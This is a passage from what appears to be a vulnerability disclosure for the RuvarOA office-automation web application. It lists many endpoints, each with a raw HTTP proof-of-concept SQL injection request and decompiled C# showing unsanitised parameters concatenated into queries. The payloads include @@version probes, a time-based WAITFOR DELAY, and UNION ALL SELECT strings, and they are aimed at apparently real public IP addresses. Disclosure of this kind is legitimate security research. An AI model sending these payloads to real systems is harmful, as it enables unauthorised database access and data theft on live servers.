    }
}

public void MakeSql()
{
    StringBuilder stringBuilder = new StringBuilder();
    DataView dataView = SqlHelper.QueryView("select * from information_schema.columns where table_name='" + tbTable.Text + "' order by ORDINAL_POSITION ASC ");
    for (int i = 0; i < dataView.Count; i++)
    {
        stringBuilder.Append(" if not exists(select * from sys_base_field where table_name='" + tbTable.Text + "' and field_name='" + dataView[i]["COLUMN_NAME"].ToString() + "')  insert into sys_base_field(table_name,field_name,field_caption,field_type,field_length,field_order,field_sort,field_show,field_search) values('" + tbTable.Text + "','" + dataView[i]["COLUMN_NAME"].ToString() + "','" + dataView[i]["COLUMN_NAME"].ToString() + "','" + dataView[i]["DATA_TYPE"].ToString() + "','" + dataView[i]["CHARACTER_OCTET_LENGTH"].ToString() + "'," + (i + 10) + ",1,1,1) \n else update sys_base_field set field_type='" + dataView[i]["DATA_TYPE"].ToString() + "',field_length='" + dataView[i]["CHARACTER_OCTET_LENGTH"].ToString() + "' where table_name='" + tbTable.Text + "' and field_name='" + dataView[i]["COLUMN_NAME"].ToString() + "' \n");
    }
    tbSql.Text = stringBuilder.ToString();
    dataView.Dispose();
}

The direct use of Request.QueryString["table"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.

wf_work_print.aspx

path

WorkFlow/wf_work_print.aspx

POC

GET /WorkFlow/wf_work_print.aspx?idlist=@@version HTTP/1.1
Host: 112.74.79.113:8000
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Connection: close


image

Vulnerability analysis

function wf_work_print within the DLL file /RuvarOA/bin/WorkFlow.dll

public class wf_work_print : Page
{
    protected HtmlGenericControl divContent;

    protected void Page_Load(object sender, EventArgs e)
    {
        string text = ((Page)this).Request.QueryString["AutoPrint"];
        if (Validate.isNullOrSpace(text))
        {
            text = "0";
        }
        string text2 = ((Page)this).Request.QueryString["idlist"];
        if (Validate.isNullOrSpace(text2))
        {
            text2 = "0";
        }
        string text3 = ((Page)this).Request.QueryString["dbname"];
        if (Validate.isNullOrSpace(text3))
        {
            text3 = "RuvarOA";
        }
        string[] array = text2.Split(new char[1] { ',' });
        BackUpDB backUpDB = new BackUpDB(text3);
        string text4 = "";
        for (int i = 0; i < array.Length; i++)
        {
            if (!Validate.isNullOrSpace(array[i]) && array[i] != "0")
            {
                DataView dataView = backUpDB.QueryDataView("select  top 1 m_content from office_missive_search where office_missive_id in (" + array[i] + ") ");
                if (dataView.Count > 0)
                {
                    text4 = ((!(text4 != "")) ? (text4 + "<div class=\"FirstPage\">" + dataView[0]["m_content"].ToString() + "</div>") : (text4 + "<div class=\"NextPage\">" + dataView[0]["m_content"].ToString() + "</div>"));
                }
                dataView.Dispose();
            }
        }
        ((HtmlContainerControl)divContent).InnerHtml = text4;
        JS.ScriptStart();
        ((Page)this).Response.Write("var AutoPrint = '" + text + "'; \n ");
        JS.ScriptEnd();
    }
}

The direct use of Request.QueryString["idlist"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.

wf_get_fields_approve.aspx

path

WorkFlow/wf_get_fields_approve.aspx

POC

GET /WorkFlow/wf_get_fields_approve.aspx?template_id=@@version HTTP/1.1
Host: 112.74.79.113:8000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7


image

Vulnerability analysis

function wf_get_fields_approve within the DLL file /RuvarOA/bin/WorkFlow.dll

public class wf_get_fields_approve : Page
{
    protected HtmlForm Form1;

    protected ListBox ddlFields;

    protected void Page_Load(object sender, EventArgs e)
    {
        //IL_00df: Unknown result type (might be due to invalid IL or missing references)
        //IL_00e9: Expected O, but got Unknown
        string text = ((Page)this).Request.QueryString["template_id"];
        if (Validate.isNullOrSpace(text))
        {
            text = "0";
        }
        DataView dataView = SqlHelper.QueryView("select top 1 * from office_missive_template where office_missive_template_id=" + text);
        if (dataView.Count > 0)
        {
            string text2 = dataView[0]["mt_approve_value"].ToString();
            string text3 = dataView[0]["mt_approve_text"].ToString();
            string[] array = text2.Split(new char[1] { ',' });
            string[] array2 = text3.Split(new char[1] { ',' });
            for (int i = 0; i < array.Length; i++)
            {
                if (!Validate.isNullOrSpace(array[i]))
                {
                    ((ListControl)ddlFields).Items.Add(new ListItem(array2[i], array[i]));
                }
            }
        }
        dataView.Dispose();
    }
}

The direct use of Request.QueryString["template_id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.

wf_work_form_save.aspx

path

WorkFlow/wf_work_form_save.aspx

POC

GET /WorkFlow/wf_work_form_save.aspx?office_missive_id=@@version HTTP/1.1
Host: 112.74.79.113:8000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7


image

Vulnerability analysis

function wf_work_form_save within the DLL file /RuvarOA/bin/WorkFlow.dll

public class wf_work_form_save : Page
{
    protected HtmlForm form1;

    protected Literal m_content;

    protected void Page_Load(object sender, EventArgs e)
    {
        string text = ((Page)this).Request.QueryString["office_missive_id"];
        string text2 = ((Page)this).Request.QueryString["dbname"];
        string text3 = ((Page)this).Request.QueryString["tablename"];
        if (Validate.isNullOrSpace(text2))
        {
            text2 = "RuvarOA";
        }
        if (Validate.isNullOrSpace(text3))
        {
            text3 = "office_missive_search";
        }
        if (Validate.isNullOrSpace(text))
        {
            text = "0";
        }
        if (text == "0")
        {
            ((Page)this).Response.End();
        }
        BackUpDB backUpDB = new BackUpDB(text2);
        DataView dataView = backUpDB.QueryDataView("select top 1 m_title,m_content from " + text3 + " where office_missive_id=" + text);
        if (dataView.Count > 0)
        {
            ((Page)this).Title = dataView[0]["m_title"].ToString();
            m_content.Text = dataView[0]["m_content"].ToString();
        }
        dataView.Dispose();
    }
}

The direct use of Request.QueryString["office_missive_id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.

WorkPlanAttachDownLoad.aspx

path

WorkPlan/WorkPlanAttachDownLoad.aspx

POC

GET /WorkPlan/WorkPlanAttachDownLoad.aspx?sys_file_storage_id=1%27%20and%20%28@@version%29%3E0%29-- HTTP/1.1
Host: 121.8.91.35:89
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7


image

Vulnerability analysis

function WorkPlanAttachDownLoad within the DLL file /RuvarOA/bin/WorkPlan.dll

public class WorkPlanAttachDownLoad : Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        string text = ((Page)this).Request.QueryString["sys_file_storage_id"];
        string text2 = "";
        string text3 = "";
        string text4 = "";
        text2 = "select top 1 * from workplan_attach where (sys_file_storage_id='" + text + "')order by sys_file_storage_id desc";
        if (text2 != "")
        {
            SqlDataReader val = SqlHelper.ExecuteReader(text2);
            while (((DbDataReader)(object)val).Read())
            {
                text4 = ((DbDataReader)(object)val)["file_type"].ToString();
                text3 = ((DbDataReader)(object)val)["file_name"].ToString();
                byte[] array = new byte[((DbDataReader)(object)val).GetBytes(12, 0L, (byte[]?)null, 0, int.MaxValue)];
                ((DbDataReader)(object)val).GetBytes(12, 0L, array, 0, array.Length);
                ((Control)this).Page.Response.ContentType = text4;
                ((Control)this).Page.Response.AddHeader("Content-Disposition", "attachment; filename=" + HttpUtility.UrlEncodeUnicode(text3) + ";");
                ((Control)this).Page.Response.BinaryWrite(array);
            }
            ((DbDataReader)(object)val).Close();
        }
    }

The direct use of Request.QueryString["sys_file_storage_id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.

file_memo.aspx

path

filemanage/file_memo.aspx

POC

GET /filemanage/file_memo.aspx?file_id=@@version HTTP/1.1
Host: 121.33.254.78:88
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Connection: close


image

Vulnerability analysis

function file_memo within the DLL file /RuvarOA/bin/filemanage.dll

public class file_memo : Page
{
    protected HtmlForm Form1;

    protected TextBox txt_file_memo;

    protected Button btnConfirm;

    protected TextBox txt_file_id;

    protected void Page_Load(object sender, EventArgs e)
    {
        if (!((Page)this).IsPostBack)
        {
            txt_file_id.Text = ((Page)this).Request.QueryString["file_id"];
            if (Validate.isNullOrSpace(txt_file_id.Text))
            {
                txt_file_id.Text = "0";
            }
            DataView dataView = SqlHelper.QueryView("select * from info_file where file_id=" + txt_file_id.Text);
            if (dataView.Count > 0)
            {
                txt_file_memo.Text = dataView[0]["file_memo"].ToString();
            }
            dataView.Dispose();
        }
    }

The direct use of Request.QueryString["file_id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.

get_company.aspx

path

ContractManage/get_company.aspx

POC

POST /ContractManage/get_company.aspx HTTP/1.1
Host: 119.131.131.101:8000
Content-Length: 527
Cache-Control: max-age=0
Origin: http://119.131.131.101:8000
DNT: 1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux i686) Gecko/20060204 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://119.131.131.101:8000/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Connection: close

__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE2NjkyODU1NDAPZBYCAgMPZBYGAgEPEGQPFgFmFgEQBQzpgInmi6nliIbnsbtlZxYBZmQCCQ88KwALAQAPFggeCERhdGFLZXlzFgAeC18hSXRlbUNvdW50Zh4JUGFnZUNvdW50AgEeFV8hRGF0YVNvdXJjZUl0ZW1Db3VudGZkZAILDw8WAh4RUGFnZXJfUmVjb3JkY291bnRmZGRkjBOPpsjzfyKuMGne7EKY2cnc17Zi99ZVNb4cfmiP0Z0%3D&ddl_type=&ddl_field=dw_bh&txt_keyword=11'%3bWAITFOR+DELAY+'0%3a0%3a5'--&btnSearch=%E6%9F%A5%E8%AF%A2&pager_input=1&pager_select=20&txt_row_index=&txt_dw_id=&txt_dw_mc=&txt_dw_bh=&txt_dw_lxr=&txt_dw_dh=
image-20240127234534888 image-20240127234448332 image-20240127234559341
POST /ContractManage/get_company.aspx HTTP/1.1
Host: 119.131.131.101:8000
Content-Length: 1149
Cache-Control: max-age=0
Origin: http://119.131.131.101:8000
DNT: 1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux i686) Gecko/20060204 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://119.131.131.101:8000/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Connection: close

__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE2NjkyODU1NDAPZBYCAgMPZBYIAgEPEGQPFgFmFgEQBQzpgInmi6nliIbnsbtlZxYBZmQCCQ88KwALAQAPFggeCERhdGFLZXlzFgAeC18hSXRlbUNvdW50Zh4JUGFnZUNvdW50AgEeFV8hRGF0YVNvdXJjZUl0ZW1Db3VudGZkZAILDw8WBB4WUGFnZXJfQ3VycmVudFBhZ2VJbmRleGYeEVBhZ2VyX1JlY29yZGNvdW50ZmRkAg0PFgIeBFRleHQFATBkZGkRakgZwcKyYwt4sQf48JqdFzMTXVIZFd8gYajJYD8E&ddl_type=&ddl_field=dw_bh&txt_keyword=11'+UNION+ALL+SELECT+CHAR(113)%2bCHAR(106)%2bCHAR(98)%2bCHAR(112)%2bCHAR(113)%2bCHAR(68)%2bCHAR(73)%2bCHAR(66)%2bCHAR(87)%2bCHAR(101)%2bCHAR(105)%2bCHAR(103)%2bCHAR(119)%2bCHAR(82)%2bCHAR(81)%2bCHAR(69)%2bCHAR(118)%2bCHAR(85)%2bCHAR(110)%2bCHAR(87)%2bCHAR(71)%2bCHAR(115)%2bCHAR(112)%2bCHAR(121)%2bCHAR(121)%2bCHAR(101)%2bCHAR(82)%2bCHAR(100)%2bCHAR(81)%2bCHAR(100)%2bCHAR(100)%2bCHAR(116)%2bCHAR(86)%2bCHAR(100)%2bCHAR(73)%2bCHAR(82)%2bCHAR(99)%2bCHAR(110)%2bCHAR(84)%2bCHAR(74)%2bCHAR(105)%2bCHAR(86)%2bCHAR(107)%2bCHAR(100)%2bCHAR(118)%2bCHAR(113)%2bCHAR(122)%2bCHAR(120)%2bCHAR(113)%2bCHAR(113)--+CwAf&btnSearch=%E6%9F%A5%E8%AF%A2&pager_input=1&pager_select=20&txt_row_index=&txt_dw_id=&txt_dw_mc=&txt_dw_bh=&txt_dw_lxr=&txt_dw_dh=

image-20240127234616046
POST /ContractManage/get_company.aspx HTTP/1.1
Host: 119.131.131.101:8000
Content-Length: 581
Cache-Control: max-age=0
Origin: http://119.131.131.101:8000
DNT: 1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux i686) Gecko/20060204 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://119.131.131.101:8000/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Connection: close

__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE2NjkyODU1NDAPZBYCAgMPZBYIAgEPEGQPFgFmFgEQBQzpgInmi6nliIbnsbtlZxYBZmQCCQ88KwALAQAPFggeCERhdGFLZXlzFgAeC18hSXRlbUNvdW50Zh4JUGFnZUNvdW50AgEeFV8hRGF0YVNvdXJjZUl0ZW1Db3VudGZkZAILDw8WBB4WUGFnZXJfQ3VycmVudFBhZ2VJbmRleGYeEVBhZ2VyX1JlY29yZGNvdW50ZmRkAg0PFgIeBFRleHQFATBkZGkRakgZwcKyYwt4sQf48JqdFzMTXVIZFd8gYajJYD8E&ddl_type=&ddl_field=dw_bh&txt_keyword=11'+UNION+ALL+SELECT+@@version--+CwAf&btnSearch=%E6%9F%A5%E8%AF%A2&pager_input=1&pager_select=20&txt_row_index=&txt_dw_id=&txt_dw_mc=&txt_dw_bh=&txt_dw_lxr=&txt_dw_dh=

image-20240127234710514

Vulnerability analysis

function get_company within the DLL file /RuvarOA/bin/ContractManage.dll

protected TextBox txt_keyword;

{
            string text2 = text;
            text = text2 + " and " + ((ListControl)ddl_field).SelectedValue + " like '%" + txt_keyword.Text + "%' ";
        }
        string format = "Exec DataPaging 'view_contract_company','*','id'," + pager.PageSize + "," + pager.CurrentPageIndex.ToString() + ",{0},0,'" + Common.FixQuote(text) + "','id'";
        DataView dataView = null;

The direct use of TextBox #id txt_keyword to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.

worklog_template_show.aspx

path

PersonalAffair/worklog_template_show.aspx

POC

GET /PersonalAffair/worklog_template_show.aspx?id=@@version HTTP/1.1
Content-Type: application/json
Host: 121.33.254.78:88
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36


Vulnerability analysis

function worklog_template_show within the DLL file /RuvarOA/bin/PersonalAffair.dll

public class worklog_template_show : Page
{
    protected HtmlForm Form1;

    protected HtmlGenericControl divTitle;

    protected HtmlGenericControl divContent;

    protected Literal lt_visible;

    protected TextBox txt_id;

    protected void Page_Load(object sender, EventArgs e)
    {
        if (!((Page)this).IsPostBack)
        {
            txt_id.Text = ((Page)this).Request.QueryString["id"];
            if (Validate.isNullOrSpace(txt_id.Text))
            {
                txt_id.Text = "0";
            }
            DataView dataView = SqlHelper.QueryView("select top 1 * from self_worklog_template where id=" + txt_id.Text);
            if (dataView.Count > 0)
            {
                ((HtmlContainerControl)divTitle).InnerHtml = dataView[0]["blog_title"].ToString();
                ((HtmlContainerControl)divContent).InnerHtml = dataView[0]["blog_content"].ToString();
            }
            dataView.Dispose();
        }
    }
}

The direct use of Request.QueryString["id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.

pm_gatt_inc.aspx

path

ProjectManage/pm_gatt_inc.aspx

POC

GET /ProjectManage/pm_gatt_inc.aspx?project_id=@@version HTTP/1.1
Host: 112.74.79.113:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36


Vulnerability analysis

function pm_gatt_inc within the DLL file /RuvarOA/bin/ProjectManage.dll

public class pm_gatt_inc : Page
{
    protected HtmlForm form1;

    protected Literal lt_gatt_script;

    protected TextBox txt_project_id;

    protected void Page_Load(object sender, EventArgs e)
    {
        if (!((Page)this).IsPostBack)
        {
            txt_project_id.Text = ((Page)this).Request.QueryString["project_id"];
            lt_gatt_script.Text = outProject();
        }
    }

    private string outProject()
    {
        StringBuilder stringBuilder = new StringBuilder();
        stringBuilder.Append("<script language=\"javascript\">\n");
        stringBuilder.Append(" function createChartControl(htmlDiv1){ \n ");
        DataView dataView = SqlHelper.QueryView("select * from project_info where id=" + txt_project_id.Text);
        if (dataView.Count > 0)
        {
            stringBuilder.Append("var project" + txt_project_id.Text + " = new GanttProjectInfo(" + txt_project_id.Text + ", \"" + dataView[0]["pi_title"].ToString() + "\", new Date(" + DateTime.Parse(dataView[0]["pi_plan_bgdate"].ToString()).ToString("yyyy,M-1,d") + "));\n");
            stringBuilder.Append(outputTask("0"));
        }
        dataView = SqlHelper.QueryView("select * from project_task_info where project_id=" + txt_project_id.Text + " and task_parentid<>0 and task_level>1 order by task_id asc");
        for (int i = 0; i < dataView.Count; i++)

The direct use of Request.QueryString["project_id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.

OfficeFileDownload.aspx

path

WorkFlow/OfficeFileDownload.aspx

POC

GET /WorkFlow/OfficeFileDownload.aspx?filename=1%27%20and%20%28@@version%29%3E0-- HTTP/1.1
Host: 112.74.79.113:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36


image-20240128001500612

Vulnerability analysis

function OfficeFileDownload within the DLL file /RuvarOA/bin/WorkFlow.dll

public class OfficeFileDownload : Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        string text = ((Page)this).Request.QueryString["filename"];
        string sQLString = "SELECT * FROM wf_office_file WHERE wordfile='" + text + "'  ";
        DataView dataView = SqlHelper.QueryView(sQLString);
        if (dataView.Count > 0)
        {
            byte[] array = (byte[])dataView[0]["filedata"];
            ((Page)this).Response.Clear();
            ((Page)this).Response.BinaryWrite(array);
        }
        else

The direct use of Request.QueryString["filename"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.

wf_work_stat_setting.aspx

path

WorkFlow/wf_work_stat_setting.aspx

POC

GET /WorkFlow/wf_work_stat_setting.aspx?template_id=@@version HTTP/1.1
Host: 8.129.124.44:88
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36


Vulnerability analysis

function wf_work_stat_setting within the DLL file /RuvarOA/bin/WorkFlow.dll

public class wf_work_stat_setting : Page
{
    protected HtmlHead Head1;

    protected HtmlForm form1;

    protected HtmlInputRadioButton statGroup_0;

    protected HtmlInputRadioButton statGroup_1;

    protected HtmlInputRadioButton statWay_0;

    protected HtmlInputRadioButton statWay_1;

    protected HtmlTable tblFields;

    protected ListBox lbStatFieldS;

    protected ListBox lbStatFieldT;

    protected TextBox txt_template_id;

    protected void Page_Load(object sender, EventArgs e)
    {
        if (!((Page)this).IsPostBack)
        {
            txt_template_id.Text = ((Page)this).Request.QueryString["template_id"];
            if (Validate.isNullOrSpace(txt_template_id.Text))
            {
                txt_template_id.Text = "0";
            }
            string text = ((Page)this).Request.QueryString["statWay"];
            string defaultField = ((Page)this).Request.QueryString["statField"];
            string text2 = ((Page)this).Request.QueryString["statGroup"];
            if (text2 == "Dept")
            {
                statGroup_1.Checked = false;
                statGroup_0.Checked = true;
            }
            else
            {
                statGroup_0.Checked = false;
                statGroup_1.Checked = true;
            }
            if (text == "Sum")
            {
                statWay_0.Checked = false;
                statWay_1.Checked = true;
                ((HtmlControl)tblFields).Attributes["style"] = "display:";
            }
            else
            {
                statWay_1.Checked = false;
                statWay_0.Checked = true;
                ((HtmlControl)tblFields).Attributes["style"] = "display:none";
            }
            InitField(defaultField);
        }
    }

    private void InitField(string defaultField)
    {
        //IL_013f: Unknown result type (might be due to invalid IL or missing references)
        //IL_0149: Expected O, but got Unknown
        //IL_00f9: Unknown result type (might be due to invalid IL or missing references)
        //IL_0103: Expected O, but got Unknown
        ((ListControl)lbStatFieldS).Items.Clear();
        ((ListControl)lbStatFieldT).Items.Clear();
        string sQLString = "SELECT f_field_name,f_field_caption,f_field_type_value from office_missive_template_field where  f_template_id=" + txt_template_id.Text + " order by f_field_order asc,office_field_id asc  ";
        DataView dataView = SqlHelper.QueryView(sQLString);

The direct use of Request.QueryString["id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.

wf_office_file_history_show.aspx

path

WorkFlow/wf_office_file_history_show.aspx

POC

GET /WorkFlow/wf_office_file_history_show.aspx?id=1%27%20and%20%28@@version%29%3E0-- HTTP/1.1
Host: 58.63.71.222:88
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36


image-20240128002609904

Vulnerability analysis

function wf_office_file_history_show within the DLL file /RuvarOA/bin/WorkFlow.dll

public class wf_office_file_history_show : Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        string text = ((Page)this).Request.QueryString["id"];
        string strSQL = "select * from wf_office_file_history  where id='" + text + "'";
        SqlDataReader val = SqlHelper.ExecuteReader(strSQL);

The direct use of Request.QueryString["id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.

SearchCondiction.aspx

path

WebUtility/SearchCondiction.aspx

POC

GET /WebUtility/SearchCondiction.aspx?PageID=1%27&type=1 HTTP/1.1
Host: 58.63.71.222:88
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36


Vulnerability analysis

function SearchCondiction within the DLL file /RuvarOA/bin/WebUtility.dll

public class SearchCondiction : Page
{
    protected HtmlHead Head1;

    protected HtmlForm form1;

    protected HtmlTable tblSearch;

    protected Button btnConfirm;

    protected void Page_Load(object sender, EventArgs e)
    {
        if (!((Page)this).IsPostBack)
        {
            string pageID = ((Page)this).Request.QueryString["PageID"];
            string text = ((Page)this).Request.QueryString["type"];
            if (text == "2")
            {
                OutPutTwo(pageID);
            }
            else
            {
                OutPutOne(pageID);
            }
        }
    }

    private void OutPutOne(string PageID)
    {
        //IL_0035: Unknown result type (might be due to invalid IL or missing references)
        //IL_003b: Expected O, but got Unknown
        //IL_003b: Unknown result type (might be due to invalid IL or missing references)
        //IL_0041: Expected O, but got Unknown
        //IL_00bd: Unknown result type (might be due to invalid IL or missing references)
        //IL_00c3: Expected O, but got Unknown
        DataView dataView = SqlHelper.QueryView("select * from sys_pagelist_search  where page_id=" + PageID + " order by field_order ");

The direct use of Request.QueryString["pageID"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.

get_find_condiction.aspx

path

WebUtility/get_find_condiction.aspx

POC

GET /WebUtility/get_find_condiction.aspx?PageID=1%27&type=1 HTTP/1.1
Host: 58.63.71.222:88
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36


Vulnerability analysis

function get_find_condiction within the DLL file /RuvarOA/bin/WebUtility.dll

namespace WebUtility;

public class get_find_condiction : Page
{
    protected HtmlHead Head1;

    protected HtmlForm form1;

    protected HtmlTable tblSearch;

    protected Button btnConfirm;

    protected void Page_Load(object sender, EventArgs e)
    {
        if (!((Page)this).IsPostBack)
        {
            string pageID = ((Page)this).Request.QueryString["PageID"];
            string text = ((Page)this).Request.QueryString["type"];
            if (text == "2")
            {
                OutPutTwo(pageID);
            }
            else
            {
                OutPutOne(pageID);
            }
        }
    }
......
  private void OutPutOne(string PageID)
    {
        //IL_0035: Unknown result type (might be due to invalid IL or missing references)
        //IL_003b: Expected O, but got Unknown
        //IL_003b: Unknown result type (might be due to invalid IL or missing references)
        //IL_0041: Expected O, but got Unknown
        //IL_00bd: Unknown result type (might be due to invalid IL or missing references)
        //IL_00c3: Expected O, but got Unknown
        DataView dataView = SqlHelper.QueryView("select * from view_sys_pagelist_field  where page_id=" + PageID + " and u_id=0 and field_search=1 order by field_order ");
        if (dataView.Count > 0)
......
    private void OutPutTwo(string PageID)
    {
        //IL_0038: Unknown result type (might be due to invalid IL or missing references)
        //IL_003e: Expected O, but got Unknown
        //IL_006c: Unknown result type (might be due to invalid IL or missing references)
        //IL_0072: Expected O, but got Unknown
        //IL_00d7: Unknown result type (might be due to invalid IL or missing references)
        //IL_00dd: Expected O, but got Unknown
        //IL_0305: Unknown result type (might be due to invalid IL or missing references)
        //IL_030b: Expected O, but got Unknown
        //IL_0370: Unknown result type (might be due to invalid IL or missing references)
        //IL_0376: Expected O, but got Unknown
        //IL_017f: Unknown result type (might be due to invalid IL or missing references)
        //IL_0185: Expected O, but got Unknown
        //IL_01e2: Unknown result type (might be due to invalid IL or missing references)
        //IL_01e8: Expected O, but got Unknown
        //IL_0276: Unknown result type (might be due to invalid IL or missing references)
        //IL_027c: Expected O, but got Unknown
        //IL_02ab: Unknown result type (might be due to invalid IL or missing references)
        //IL_02b1: Expected O, but got Unknown
        //IL_04e5: Unknown result type (might be due to invalid IL or missing references)
        //IL_04eb: Expected O, but got Unknown
        DataView dataView = SqlHelper.QueryView("select * from view_sys_pagelist_field  where page_id=" + PageID + " and u_id=0 and field_search=1 order by field_order ");
        int num = 0;
        if (dataView.Count > 0)

The direct use of Request.QueryString["PageID"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.

get_dict.aspx

path

include/get_dict.aspx

POC

GET /include/get_dict.aspx?bi_value=1&bt_id=1%29+AND+1248+IN+%28SELECT+@@version%29+AND+%282558%3D2558&bt_name=1&bi_name=1 HTTP/1.1
Host: 183.6.103.52:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36


image-20240128004110975

Vulnerability analysis

function get_dict within the DLL file /RuvarOA/bin/include.dll

public class get_dict : Page
{
    protected HtmlForm form1;

    protected GridView dataGrid;

    protected Literal lt_bt_id;

    protected Literal lt_bi_name;

    protected Literal lt_bi_id;

    protected void Page_Load(object sender, EventArgs e)
    {
        lt_bt_id.Text = ((Page)this).Request.QueryString["bt_id"];
        string text = ((Page)this).Request.QueryString["bt_name"];
        lt_bi_id.Text = ((Page)this).Request.QueryString["bi_id"];
        lt_bi_name.Text = ((Page)this).Request.QueryString["bi_name"];
